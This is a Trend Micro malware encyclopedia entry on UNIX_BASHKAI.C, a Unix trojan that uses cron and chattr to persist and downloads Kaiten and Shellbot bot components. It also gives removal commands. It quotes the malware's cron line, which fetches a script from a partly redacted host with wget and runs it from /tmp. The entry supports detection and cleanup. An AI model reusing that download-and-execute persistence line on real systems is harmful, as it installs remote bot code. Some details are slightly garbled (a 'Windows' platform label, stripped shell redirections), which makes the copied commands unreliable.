Analysis by: Christopher Daniel So
 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Dropped by other malware, Downloaded from the Internet

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size: Varies
File Type: Script
Memory Resident: No
Initial Samples Received Date: 13 Oct 2014
Payload: Connects to URLs/IPs, Downloads files, Drops files

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

NOTES:

It drops the file /etc/cron.weekly/00logrotate to download from http://{BLOCKED}host.us/bots/regular.bot and save to /tmp/sh, execute and delete the downloaded /tmp/sh.

It schedules the weekly download and execution of http://{BLOCKED}host.us/bots/regular.bot by appending it to the cron table.

It sets the read-only attribute of the files /etc/init.d/ssh, /etc/cron.weekly/00logrotate, /etc/init.d/rc, /usr/bin/crontab, /var/spool/cron/crontabs/root.

It creates a copy of /usr/bin/chattr to /usr/bin/chattr. It removes all permissions from /usr/bin/chattr and sets its read-only attribute.

The downloaded file /tmp/sh from http://{BLOCKED}host.us/bots/regular.bot , also detected by Trend Micro as UNIX_BASHKAI.C, downloads from the following URLs:

  • http://{BLOCKED}host.us/manual/a.c (saved as /tmp/a.c) - detected by Trend Micro as TROJ_KAITEN.A
  • http://{BLOCKED}host.us/manual/pb (saved as /tmp/p) - detected by Trend Micro as PERL_SHELLBOT.SM
  • http://{BLOCKED}host.us/manual/b (saved as /tmp/b) - detected by Trend Micro as ELF_KAITEN.SM
  • http://{BLOCKED}host.us/bots/persist (saved as /tmp/malware.must.live) - also detected by Trend Micro as UNIX_BASHKAI.C

Using the installed GNU compiler, it compiles /tmp/a.c to /tmp/kjournald.

It executes the compiled file /tmp/kjournald and the downloaded files /tmp/p, /tmp/b, and /tmp/malware.must.live and deletes them afterwards.

The downloaded file /tmp/malware.must.live is the same as the downloader of http://{BLOCKED}host.us/bots/regular.bot with the exception of that it deletes /usr/bin/chattr. before terminating.

  SOLUTION

Minimum Scan Engine: 9.700
FIRST VSAPI PATTERN FILE: 11.208.06
FIRST VSAPI PATTERN DATE: 13 Oct 2014

Step 1

Remove malware/grayware files dropped/downloaded by UNIX_BASHKAI.C. (Note: Please skip this step if the threats listed below have already been removed.)

    • ELF_KAITEN.SM
    • PERL_SHELLBOT.SM
    • TROJ_KAITEN.A

Step 2

Scan your computer with your Trend Micro product to delete files detected as UNIX_BASHKAI.C. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

NOTES:

In the system's terminal, type the following commands:

chattr -isa /etc/cron.weekly/00logrotate
chattr -isa /etc/init.d/rc
chattr -isa /etc/init.d/ssh
chattr -isa /usr/bin/crontab
chattr -isa /var/spool/cron/crontabs/root
chmod 755 /usr/bin/chattr
rm /etc/cron.weekly/00logrotate
rm /tmp/kjournald

To remove the crontab autostart entry, export the current crontab to a temporary file by typing the following command in the system's terminal: crontab -l /tmp/cron.tmp

Using a text editor, edit the temporary file /tmp/cron.tmp to remove the following line(replaced {BLOCKED} with "stable"):

@weekly wget -q http://{BLOCKED}host.us/bots/regular.bot -O /tmp/sh sh /tmp/sh;rm -rf /tmp/sh /dev/null 2 1

Type the following commands to remove the cron autostart entry and to delete the temporary file:

crontab /tmp/cron.tmp
rm /tmp/cron.tmp


Did this description help? Tell us how we did.